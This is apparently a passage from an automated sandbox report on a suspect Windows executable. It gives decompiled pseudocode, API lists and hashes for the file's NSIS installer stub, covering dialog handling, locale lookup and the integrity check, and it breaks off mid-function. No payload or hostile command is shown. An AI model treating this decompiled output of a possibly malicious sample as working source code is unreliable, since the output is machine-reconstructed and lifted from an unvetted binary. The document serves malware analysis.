                                                                                                                          							__eflags =  *0x423f0c - _t133; // 0x0
                                                                                                                          							if(__eflags == 0) {
                                                                                                                          								_push( *0x420470);
                                                                                                                          							} else {
                                                                                                                          								SendMessageA(_t125, 0x401, 2, _t133);
                                                                                                                          								_push( *0x41f438);
                                                                                                                          							}
                                                                                                                          							E00403DC4();
                                                                                                                          							E004059DD(0x420478, "sail Setup");
                                                                                                                          							E004059FF(0x420478, _t125, _t130,  &(0x420478[lstrlenA(0x420478)]),  *((intOrPtr*)(_t130 + 0x18)));
                                                                                                                          							SetWindowTextA(_t125, 0x420478);
                                                                                                                          							_push(_t133);
                                                                                                                          							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
                                                                                                                          							__eflags = _t67;
                                                                                                                          							if(_t67 != 0) {
                                                                                                                          								continue;
                                                                                                                          							} else {
                                                                                                                          								__eflags =  *_t130 - _t133;
                                                                                                                          								if( *_t130 == _t133) {
                                                                                                                          									continue;
                                                                                                                          								}
                                                                                                                          								__eflags =  *(_t130 + 4) - 5;
                                                                                                                          								if( *(_t130 + 4) != 5) {
                                                                                                                          									DestroyWindow( *0x423658);
                                                                                                                          									 *0x41fc48 = _t130;
                                                                                                                          									__eflags =  *_t130 - _t133;
                                                                                                                          									if( *_t130 <= _t133) {
                                                                                                                          										goto L58;
                                                                                                                          									}
                                                                                                                          									_t73 = CreateDialogParamA( *0x423e80,  *_t130 +  *0x423660 & 0x0000ffff, _t125,  *(0x4091a8 +  *(_t130 + 4) * 4), _t130);
                                                                                                                          									__eflags = _t73 - _t133;
                                                                                                                          									 *0x423658 = _t73;
                                                                                                                          									if(_t73 == _t133) {
                                                                                                                          										goto L58;
                                                                                                                          									}
                                                                                                                          									_push( *((intOrPtr*)(_t130 + 0x2c)));
                                                                                                                          									_push(6);
                                                                                                                          									E00403D8F(_t73);
                                                                                                                          									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
                                                                                                                          									ScreenToClient(_t125, _t134 + 0x10);
                                                                                                                          									SetWindowPos( *0x423658, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
                                                                                                                          									_push(_t133);
                                                                                                                          									E00401389( *((intOrPtr*)(_t130 + 0xc)));
                                                                                                                          									__eflags =  *0x42364c - _t133; // 0x0
                                                                                                                          									if(__eflags != 0) {
                                                                                                                          										goto L61;
                                                                                                                          									}
                                                                                                                          									ShowWindow( *0x423658, 8);
                                                                                                                          									E00403DDB(0x405);
                                                                                                                          									goto L58;
                                                                                                                          								}
                                                                                                                          								__eflags =  *0x423f0c - _t133; // 0x0
                                                                                                                          								if(__eflags != 0) {
                                                                                                                          									goto L61;
                                                                                                                          								}
                                                                                                                          								__eflags =  *0x423f00 - _t133; // 0x0
                                                                                                                          								if(__eflags != 0) {
                                                                                                                          									continue;
                                                                                                                          								}
                                                                                                                          								goto L61;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						DestroyWindow( *0x423658);
                                                                                                                          						 *0x423e88 = _t133;
                                                                                                                          						EndDialog(_t125,  *0x41f840);
                                                                                                                          						goto L58;
                                                                                                                          					} else {
                                                                                                                          						__eflags = _t35 - 1;
                                                                                                                          						if(_t35 != 1) {
                                                                                                                          							L33:
                                                                                                                          							__eflags =  *_t130 - _t133;
                                                                                                                          							if( *_t130 == _t133) {
                                                                                                                          								goto L61;
                                                                                                                          							}
                                                                                                                          							goto L34;
                                                                                                                          						}
                                                                                                                          						_push(0);
                                                                                                                          						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
                                                                                                                          						__eflags = _t86;
                                                                                                                          						if(_t86 == 0) {
                                                                                                                          							goto L33;
                                                                                                                          						}
                                                                                                                          						SendMessageA( *0x423658, 0x40f, 0, 1);
                                                                                                                          						__eflags =  *0x42364c - _t133; // 0x0
                                                                                                                          						return 0 | __eflags == 0x00000000;
                                                                                                                          					}
                                                                                                                          				} else {
                                                                                                                          					_t125 = _a4;
                                                                                                                          					_t133 = 0;
                                                                                                                          					if(_t115 == 0x47) {
                                                                                                                          						SetWindowPos( *0x420450, _t125, 0, 0, 0, 0, 0x13);
                                                                                                                          					}
                                                                                                                          					if(_t115 == 5) {
                                                                                                                          						asm("sbb eax, eax");
                                                                                                                          						ShowWindow( *0x420450,  ~(_a12 - 1) & _t115);
                                                                                                                          					}
                                                                                                                          					if(_t115 != 0x40d) {
                                                                                                                          						__eflags = _t115 - 0x11;
                                                                                                                          						if(_t115 != 0x11) {
                                                                                                                          							__eflags = _t115 - 0x111;
                                                                                                                          							if(_t115 != 0x111) {
                                                                                                                          								L26:
                                                                                                                          								return E00403DF6(_t115, _a12, _a16);
                                                                                                                          							}
                                                                                                                          							_t132 = _a12 & 0x0000ffff;
                                                                                                                          							_t126 = GetDlgItem(_t125, _t132);
                                                                                                                          							__eflags = _t126 - _t133;
                                                                                                                          							if(_t126 == _t133) {
                                                                                                                          								L13:
                                                                                                                          								__eflags = _t132 - 1;
                                                                                                                          								if(_t132 != 1) {
                                                                                                                          									__eflags = _t132 - 3;
                                                                                                                          									if(_t132 != 3) {
                                                                                                                          										_t127 = 2;
                                                                                                                          										__eflags = _t132 - _t127;
                                                                                                                          										if(_t132 != _t127) {
                                                                                                                          											L25:
                                                                                                                          											SendMessageA( *0x423658, 0x111, _a12, _a16);
                                                                                                                          											goto L26;
                                                                                                                          										}
                                                                                                                          										__eflags =  *0x423f0c - _t133; // 0x0
                                                                                                                          										if(__eflags == 0) {
                                                                                                                          											_t99 = E0040140B(3);
                                                                                                                          											__eflags = _t99;
                                                                                                                          											if(_t99 != 0) {
                                                                                                                          												goto L26;
                                                                                                                          											}
                                                                                                                          											 *0x41f840 = 1;
                                                                                                                          											L21:
                                                                                                                          											_push(0x78);
                                                                                                                          											L22:
                                                                                                                          											E00403D68();
                                                                                                                          											goto L26;
                                                                                                                          										}
                                                                                                                          										E0040140B(_t127);
                                                                                                                          										 *0x41f840 = _t127;
                                                                                                                          										goto L21;
                                                                                                                          									}
                                                                                                                          									__eflags =  *0x4091a4 - _t133; // 0xffffffff
                                                                                                                          									if(__eflags <= 0) {
                                                                                                                          										goto L25;
                                                                                                                          									}
                                                                                                                          									_push(0xffffffff);
                                                                                                                          									goto L22;
                                                                                                                          								}
                                                                                                                          								_push(_t132);
                                                                                                                          								goto L22;
                                                                                                                          							}
                                                                                                                          							SendMessageA(_t126, 0xf3, _t133, _t133);
                                                                                                                          							_t103 = IsWindowEnabled(_t126);
                                                                                                                          							__eflags = _t103;
                                                                                                                          							if(_t103 == 0) {
                                                                                                                          								goto L61;
                                                                                                                          							}
                                                                                                                          							goto L13;
                                                                                                                          						}
                                                                                                                          						SetWindowLongA(_t125, _t133, _t133);
                                                                                                                          						return 1;
                                                                                                                          					} else {
                                                                                                                          						DestroyWindow( *0x423658);
                                                                                                                          						 *0x423658 = _a12;
                                                                                                                          						L58:
                                                                                                                          						if( *0x421478 == _t133) {
                                                                                                                          							_t142 =  *0x423658 - _t133; // 0x0
                                                                                                                          							if(_t142 != 0) {
                                                                                                                          								ShowWindow(_t125, 0xa);
                                                                                                                          								 *0x421478 = 1;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						L61:
                                                                                                                          						return 0;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          			}
































                                                                                                                          0x00403901
                                                                                                                          0x0040390a
                                                                                                                          0x00403915
                                                                                                                          0x00403915
                                                                                                                          0x00403921
                                                                                                                          0x0040393d
                                                                                                                          0x00403940
                                                                                                                          0x00403953
                                                                                                                          0x00403959
                                                                                                                          0x004039fc
                                                                                                                          0x00000000
                                                                                                                          0x00403a05
                                                                                                                          0x0040395f
                                                                                                                          0x0040396c
                                                                                                                          0x0040396e
                                                                                                                          0x00403970
                                                                                                                          0x0040398f
                                                                                                                          0x0040398f
                                                                                                                          0x00403992
                                                                                                                          0x00403997
                                                                                                                          0x0040399a
                                                                                                                          0x004039aa
                                                                                                                          0x004039ab
                                                                                                                          0x004039ad
                                                                                                                          0x004039e3
                                                                                                                          0x004039f6
                                                                                                                          0x00000000
                                                                                                                          0x004039f6
                                                                                                                          0x004039af
                                                                                                                          0x004039b5
                                                                                                                          0x004039ce
                                                                                                                          0x004039d3
                                                                                                                          0x004039d5
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004039d7
                                                                                                                          0x004039c3
                                                                                                                          0x004039c3
                                                                                                                          0x004039c5
                                                                                                                          0x004039c5
                                                                                                                          0x00000000
                                                                                                                          0x004039c5
                                                                                                                          0x004039b8
                                                                                                                          0x004039bd
                                                                                                                          0x00000000
                                                                                                                          0x004039bd
                                                                                                                          0x0040399c
                                                                                                                          0x004039a2
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004039a4
                                                                                                                          0x00000000
                                                                                                                          0x004039a4
                                                                                                                          0x00403994
                                                                                                                          0x00000000
                                                                                                                          0x00403994
                                                                                                                          0x0040397a
                                                                                                                          0x00403981
                                                                                                                          0x00403987
                                                                                                                          0x00403989
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403989
                                                                                                                          0x00403945
                                                                                                                          0x00000000
                                                                                                                          0x00403923
                                                                                                                          0x00403929
                                                                                                                          0x00403933
                                                                                                                          0x00403d39
                                                                                                                          0x00403d3f
                                                                                                                          0x00403d41
                                                                                                                          0x00403d47
                                                                                                                          0x00403d4c
                                                                                                                          0x00403d52
                                                                                                                          0x00403d52
                                                                                                                          0x00403d47
                                                                                                                          0x00403d5c
                                                                                                                          0x00000000
                                                                                                                          0x00403d5c
                                                                                                                          0x00403921

                                                                                                                          APIs
                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004038F8
                                                                                                                          • ShowWindow.USER32(?), ref: 00403915
                                                                                                                          • DestroyWindow.USER32 ref: 00403929
                                                                                                                          • SetWindowLongA.USER32 ref: 00403945
                                                                                                                          • GetDlgItem.USER32 ref: 00403966
                                                                                                                          • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 0040397A
                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00403981
                                                                                                                          • GetDlgItem.USER32 ref: 00403A2F
                                                                                                                          • GetDlgItem.USER32 ref: 00403A39
                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 00403A53
                                                                                                                          • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403AA4
                                                                                                                          • GetDlgItem.USER32 ref: 00403B4A
                                                                                                                          • ShowWindow.USER32(00000000,?), ref: 00403B6B
                                                                                                                          • EnableWindow.USER32(?,?), ref: 00403B7D
                                                                                                                          • EnableWindow.USER32(?,?), ref: 00403B98
                                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403BAE
                                                                                                                          • EnableMenuItem.USER32 ref: 00403BB5
                                                                                                                          • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403BCD
                                                                                                                          • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403BE0
                                                                                                                          • lstrlenA.KERNEL32(00420478,?,00420478,sail Setup), ref: 00403C09
                                                                                                                          • SetWindowTextA.USER32(?,00420478), ref: 00403C18
                                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 00403D4C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Item$MessageSend$EnableShow$Menu$CallbackDestroyDispatcherEnabledLongSystemTextUserlstrlen
                                                                                                                          • String ID: sail Setup
                                                                                                                          • API String ID: 4050669955-319608084
                                                                                                                          • Opcode ID: d8b962e911b7c253e61e73d21e88cb3add85ad3b5a8fe6332aee3bd0e594c397
                                                                                                                          • Instruction ID: 874aaf0cc80a4ada72e8b6aceb9d73cb056a569e4b675a7f159d56e4bf17f1bf
                                                                                                                          • Opcode Fuzzy Hash: d8b962e911b7c253e61e73d21e88cb3add85ad3b5a8fe6332aee3bd0e594c397
                                                                                                                          • Instruction Fuzzy Hash: F9C18E71A04204BBDB206F21ED85E2B3E7CEB05746F40453EF641B52F1C779AA429B2E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E00403526() {
                                                                                                                          				intOrPtr _v4;
                                                                                                                          				intOrPtr _v8;
                                                                                                                          				int _v12;
                                                                                                                          				int _v16;
                                                                                                                          				char _v20;
                                                                                                                          				void* __ebx;
                                                                                                                          				void* __edi;
                                                                                                                          				void* __esi;
                                                                                                                          				intOrPtr* _t20;
                                                                                                                          				signed int _t24;
                                                                                                                          				void* _t28;
                                                                                                                          				void* _t30;
                                                                                                                          				int _t31;
                                                                                                                          				void* _t34;
                                                                                                                          				struct HINSTANCE__* _t37;
                                                                                                                          				int _t38;
                                                                                                                          				intOrPtr _t39;
                                                                                                                          				int _t42;
                                                                                                                          				intOrPtr _t60;
                                                                                                                          				char _t62;
                                                                                                                          				CHAR* _t64;
                                                                                                                          				signed char _t68;
                                                                                                                          				struct HINSTANCE__* _t76;
                                                                                                                          				CHAR* _t79;
                                                                                                                          				intOrPtr _t81;
                                                                                                                          				CHAR* _t86;
                                                                                                                          
                                                                                                                          				_t81 =  *0x423e90; // 0x4868b0
                                                                                                                          				_t20 = E00405CFF(6);
                                                                                                                          				_t88 = _t20;
                                                                                                                          				if(_t20 == 0) {
                                                                                                                          					_t79 = 0x420478;
                                                                                                                          					"1033" = 0x7830;
                                                                                                                          					E004058C4(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420478, 0);
                                                                                                                          					__eflags =  *0x420478;
                                                                                                                          					if(__eflags == 0) {
                                                                                                                          						E004058C4(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x420478, 0);
                                                                                                                          					}
                                                                                                                          					lstrcatA("1033", _t79);
                                                                                                                          				} else {
                                                                                                                          					E0040593B("1033",  *_t20() & 0x0000ffff);
                                                                                                                          				}
                                                                                                                          				E004037EF(_t76, _t88);
                                                                                                                          				_t24 =  *0x423e98; // 0x80
                                                                                                                          				_t85 = "C:\\Users\\engineer\\AppData\\Local\\Temp";
                                                                                                                          				 *0x423f00 = _t24 & 0x00000020;
                                                                                                                          				 *0x423f1c = 0x10000;
                                                                                                                          				if(E004055B1(_t88, "C:\\Users\\engineer\\AppData\\Local\\Temp") != 0) {
                                                                                                                          					L16:
                                                                                                                          					if(E004055B1(_t96, _t85) == 0) {
                                                                                                                          						E004059FF(0, _t79, _t81, _t85,  *((intOrPtr*)(_t81 + 0x118)));
                                                                                                                          					}
                                                                                                                          					_t28 = LoadImageA( *0x423e80, 0x67, 1, 0, 0, 0x8040); // executed
                                                                                                                          					 *0x423668 = _t28;
                                                                                                                          					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
                                                                                                                          						L21:
                                                                                                                          						if(E0040140B(0) == 0) {
                                                                                                                          							_t30 = E004037EF(_t76, __eflags);
                                                                                                                          							__eflags =  *0x423f20; // 0x0
                                                                                                                          							if(__eflags != 0) {
                                                                                                                          								_t31 = E00404E4D(_t30, 0);
                                                                                                                          								__eflags = _t31;
                                                                                                                          								if(_t31 == 0) {
                                                                                                                          									E0040140B(1);
                                                                                                                          									goto L33;
                                                                                                                          								}
                                                                                                                          								__eflags =  *0x42364c; // 0x0
                                                                                                                          								if(__eflags == 0) {
                                                                                                                          									E0040140B(2);
                                                                                                                          								}
                                                                                                                          								goto L22;
                                                                                                                          							}
                                                                                                                          							ShowWindow( *0x420450, 5); // executed
                                                                                                                          							_t37 = LoadLibraryA("RichEd20"); // executed
                                                                                                                          							__eflags = _t37;
                                                                                                                          							if(_t37 == 0) {
                                                                                                                          								LoadLibraryA("RichEd32");
                                                                                                                          							}
                                                                                                                          							_t86 = "RichEdit20A";
                                                                                                                          							_t38 = GetClassInfoA(0, _t86, 0x423620);
                                                                                                                          							__eflags = _t38;
                                                                                                                          							if(_t38 == 0) {
                                                                                                                          								GetClassInfoA(0, "RichEdit", 0x423620);
                                                                                                                          								 *0x423644 = _t86;
                                                                                                                          								RegisterClassA(0x423620);
                                                                                                                          							}
                                                                                                                          							_t39 =  *0x423660; // 0x0
                                                                                                                          							_t42 = DialogBoxParamA( *0x423e80, _t39 + 0x00000069 & 0x0000ffff, 0, E004038BC, 0); // executed
                                                                                                                          							E00403476(E0040140B(5), 1);
                                                                                                                          							return _t42;
                                                                                                                          						}
                                                                                                                          						L22:
                                                                                                                          						_t34 = 2;
                                                                                                                          						return _t34;
                                                                                                                          					} else {
                                                                                                                          						_t76 =  *0x423e80; // 0x400000
                                                                                                                          						 *0x423634 = _t28;
                                                                                                                          						_v20 = 0x624e5f;
                                                                                                                          						 *0x423624 = E00401000;
                                                                                                                          						 *0x423630 = _t76;
                                                                                                                          						 *0x423644 =  &_v20;
                                                                                                                          						if(RegisterClassA(0x423620) == 0) {
                                                                                                                          							L33:
                                                                                                                          							__eflags = 0;
                                                                                                                          							return 0;
                                                                                                                          						}
                                                                                                                          						_t12 =  &_v16; // 0x624e5f
                                                                                                                          						SystemParametersInfoA(0x30, 0, _t12, 0);
                                                                                                                          						 *0x420450 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423e80, 0);
                                                                                                                          						goto L21;
                                                                                                                          					}
                                                                                                                          				} else {
                                                                                                                          					_t76 =  *(_t81 + 0x48);
                                                                                                                          					if(_t76 == 0) {
                                                                                                                          						goto L16;
                                                                                                                          					}
                                                                                                                          					_t60 =  *0x423eb8; // 0x48a39c
                                                                                                                          					_t79 = 0x422e20;
                                                                                                                          					E004058C4( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) + _t60, 0x422e20, 0);
                                                                                                                          					_t62 =  *0x422e20; // 0x43
                                                                                                                          					if(_t62 == 0) {
                                                                                                                          						goto L16;
                                                                                                                          					}
                                                                                                                          					if(_t62 == 0x22) {
                                                                                                                          						_t79 = 0x422e21;
                                                                                                                          						 *((char*)(E004054FB(0x422e21, 0x22))) = 0;
                                                                                                                          					}
                                                                                                                          					_t64 = lstrlenA(_t79) + _t79 - 4;
                                                                                                                          					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
                                                                                                                          						L15:
                                                                                                                          						E004059DD(_t85, E004054D0(_t79));
                                                                                                                          						goto L16;
                                                                                                                          					} else {
                                                                                                                          						_t68 = GetFileAttributesA(_t79);
                                                                                                                          						if(_t68 == 0xffffffff) {
                                                                                                                          							L14:
                                                                                                                          							E00405517(_t79);
                                                                                                                          							goto L15;
                                                                                                                          						}
                                                                                                                          						_t96 = _t68 & 0x00000010;
                                                                                                                          						if((_t68 & 0x00000010) != 0) {
                                                                                                                          							goto L15;
                                                                                                                          						}
                                                                                                                          						goto L14;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          			}

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00405CFF: GetModuleHandleA.KERNEL32(?,?,00000000,0040310E,00000008), ref: 00405D11
                                                                                                                            • Part of subcall function 00405CFF: LoadLibraryA.KERNELBASE(?,?,00000000,0040310E,00000008), ref: 00405D1C
                                                                                                                            • Part of subcall function 00405CFF: GetProcAddress.KERNEL32(00000000,?), ref: 00405D2D
                                                                                                                          • lstrcatA.KERNEL32(1033,00420478,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420478,00000000,00000006,"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403597
                                                                                                                          • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,00420478,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420478,00000000,00000006,"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" ), ref: 0040360C
                                                                                                                          • lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,00420478,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420478,00000000), ref: 0040361F
                                                                                                                          • GetFileAttributesA.KERNEL32(Call), ref: 0040362A
                                                                                                                          • LoadImageA.USER32 ref: 00403673
                                                                                                                            • Part of subcall function 0040593B: wsprintfA.USER32 ref: 00405948
                                                                                                                          • RegisterClassA.USER32 ref: 004036BA
                                                                                                                          • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004036D2
                                                                                                                          • CreateWindowExA.USER32 ref: 0040370B
                                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403741
                                                                                                                          • LoadLibraryA.KERNELBASE(RichEd20), ref: 00403752
                                                                                                                          • LoadLibraryA.KERNEL32(RichEd32), ref: 0040375D
                                                                                                                          • GetClassInfoA.USER32 ref: 0040376D
                                                                                                                          • GetClassInfoA.USER32 ref: 0040377A
                                                                                                                          • RegisterClassA.USER32 ref: 00403783
                                                                                                                          • DialogBoxParamA.USER32 ref: 004037A2
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                          • String ID: 6B$"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                          • API String ID: 914957316-737491654
                                                                                                                          • Opcode ID: ca5c191d662c2f1331136733af7cd9fb3c1208b0aa80a7c8f6e1579a7abb4d19
                                                                                                                          • Instruction ID: 0f3f48bff709b167bb3a38cee6451da723a784a17f6d38f49bc0c0f1e25ee8dd
                                                                                                                          • Opcode Fuzzy Hash: ca5c191d662c2f1331136733af7cd9fb3c1208b0aa80a7c8f6e1579a7abb4d19
                                                                                                                          • Instruction Fuzzy Hash: 9261C5B1A04200BAD6206F659C45E3B3A6DE74474AF40453FF941B62E1D67D9E028B3E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 80%
                                                                                                                          			E00402C22(void* __eflags, signed int _a4) {
                                                                                                                          				DWORD* _v8;
                                                                                                                          				DWORD* _v12;
                                                                                                                          				void* _v16;
                                                                                                                          				intOrPtr _v20;
                                                                                                                          				long _v24;
                                                                                                                          				intOrPtr _v28;
                                                                                                                          				intOrPtr _v32;
                                                                                                                          				intOrPtr _v36;
                                                                                                                          				intOrPtr _v40;
                                                                                                                          				signed int _v44;
                                                                                                                          				long _t43;
                                                                                                                          				signed int _t50;
                                                                                                                          				void* _t53;
                                                                                                                          				signed int _t54;
                                                                                                                          				void* _t57;
                                                                                                                          				intOrPtr* _t59;
                                                                                                                          				long _t60;
                                                                                                                          				signed int _t65;
                                                                                                                          				signed int _t67;
                                                                                                                          				signed int _t70;
                                                                                                                          				signed int _t71;
                                                                                                                          				signed int _t77;
                                                                                                                          				intOrPtr _t80;
                                                                                                                          				long _t82;
                                                                                                                          				signed int _t85;
                                                                                                                          				signed int _t87;
                                                                                                                          				void* _t89;
                                                                                                                          				signed int _t90;
                                                                                                                          				signed int _t93;
                                                                                                                          				void* _t94;
                                                                                                                          
                                                                                                                          				_t82 = 0;
                                                                                                                          				_v12 = 0;
                                                                                                                          				_v8 = 0;
                                                                                                                          				_t43 = GetTickCount();
                                                                                                                          				_t91 = "C:\\Users\\engineer\\AppData\\Local\\Temp\\3582-490\\vi0EwpbUht.exe";
                                                                                                                          				 *0x423e8c = _t43 + 0x3e8;
                                                                                                                          				GetModuleFileNameA(0, "C:\\Users\\engineer\\AppData\\Local\\Temp\\3582-490\\vi0EwpbUht.exe", 0x400);
                                                                                                                          				_t89 = E004056B4(_t91, 0x80000000, 3);
                                                                                                                          				_v16 = _t89;
                                                                                                                          				 *0x409014 = _t89;
                                                                                                                          				if(_t89 == 0xffffffff) {
                                                                                                                          					return "Error launching installer";
                                                                                                                          				}
                                                                                                                          				_t92 = "C:\\Users\\engineer\\AppData\\Local\\Temp\\3582-490";
                                                                                                                          				E004059DD("C:\\Users\\engineer\\AppData\\Local\\Temp\\3582-490", _t91);
                                                                                                                          				E004059DD(0x42b000, E00405517(_t92));
                                                                                                                          				_t50 = GetFileSize(_t89, 0);
                                                                                                                          				__eflags = _t50;
                                                                                                                          				 *0x41f028 = _t50;
                                                                                                                          				_t93 = _t50;
                                                                                                                          				if(_t50 <= 0) {
                                                                                                                          					L24:
                                                                                                                          					E00402BBE(1);
                                                                                                                          					__eflags =  *0x423e94 - _t82; // 0x7e00
                                                                                                                          					if(__eflags == 0) {
                                                                                                                          						goto L29;
                                                                                                                          					}
                                                                                                                          					__eflags = _v8 - _t82;
                                                                                                                          					if(_v8 == _t82) {
                                                                                                                          						L28:
                                                                                                                          						_t53 = GlobalAlloc(0x40, _v24); // executed
                                                                                                                          						_t94 = _t53;
                                                                                                                          						_t54 =  *0x423e94; // 0x7e00
                                                                                                                          						E00403080(_t54 + 0x1c);
                                                                                                                          						_push(_v24);
                                                                                                                          						_push(_t94);
                                                                                                                          						_push(_t82);
                                                                                                                          						_push(0xffffffff); // executed
                                                                                                                          						_t57 = E00402E5B(); // executed
                                                                                                                          						__eflags = _t57 - _v24;
                                                                                                                          						if(_t57 == _v24) {
                                                                                                                          							__eflags = _v44 & 0x00000001;
                                                                                                                          							 *0x423e90 = _t94;
                                                                                                                          							 *0x423e98 =  *_t94;
                                                                                                                          							if((_v44 & 0x00000001) != 0) {
                                                                                                                          								 *0x423e9c =  *0x423e9c + 1;
                                                                                                                          								__eflags =  *0x423e9c;
                                                                                                                          							}
                                                                                                                          							_t40 = _t94 + 0x44; // 0x44
                                                                                                                          							_t59 = _t40;
                                                                                                                          							_t85 = 8;
                                                                                                                          							do {
                                                                                                                          								_t59 = _t59 - 8;
                                                                                                                          								 *_t59 =  *_t59 + _t94;
                                                                                                                          								_t85 = _t85 - 1;
                                                                                                                          								__eflags = _t85;
                                                                                                                          							} while (_t85 != 0);
                                                                                                                          							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                                                                                                          							 *(_t94 + 0x3c) = _t60;
                                                                                                                          							E00405675(0x423ea0, _t94 + 4, 0x40);
                                                                                                                          							__eflags = 0;
                                                                                                                          							return 0;
                                                                                                                          						}
                                                                                                                          						goto L29;
                                                                                                                          					}
                                                                                                                          					E00403080( *0x40b018);
                                                                                                                          					_t65 = E0040304E( &_a4, 4);
                                                                                                                          					__eflags = _t65;
                                                                                                                          					if(_t65 == 0) {
                                                                                                                          						goto L29;
                                                                                                                          					}
                                                                                                                          					__eflags = _v12 - _a4;
                                                                                                                          					if(_v12 != _a4) {
                                                                                                                          						goto L29;
                                                                                                                          					}
                                                                                                                          					goto L28;
                                                                                                                          				} else {
                                                                                                                          					do {
                                                                                                                          						_t67 =  *0x423e94; // 0x7e00
                                                                                                                          						_t90 = _t93;
                                                                                                                          						asm("sbb eax, eax");
                                                                                                                          						_t70 = ( ~_t67 & 0x00007e00) + 0x200;
                                                                                                                          						__eflags = _t93 - _t70;
                                                                                                                          						if(_t93 >= _t70) {
                                                                                                                          							_t90 = _t70;
                                                                                                                          						}
                                                                                                                          						_t71 = E0040304E(0x417028, _t90); // executed
                                                                                                                          						__eflags = _t71;
                                                                                                                          						if(_t71 == 0) {
                                                                                                                          							E00402BBE(1);
                                                                                                                          							L29:
                                                                                                                          							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                                                                                          						}
                                                                                                                          						__eflags =  *0x423e94;
                                                                                                                          						if( *0x423e94 != 0) {
                                                                                                                          							__eflags = _a4 & 0x00000002;
                                                                                                                          							if((_a4 & 0x00000002) == 0) {
                                                                                                                          								E00402BBE(0);
                                                                                                                          							}
                                                                                                                          							goto L20;
                                                                                                                          						}
                                                                                                                          						E00405675( &_v44, 0x417028, 0x1c);
                                                                                                                          						_t77 = _v44;
                                                                                                                          						__eflags = _t77 & 0xfffffff0;
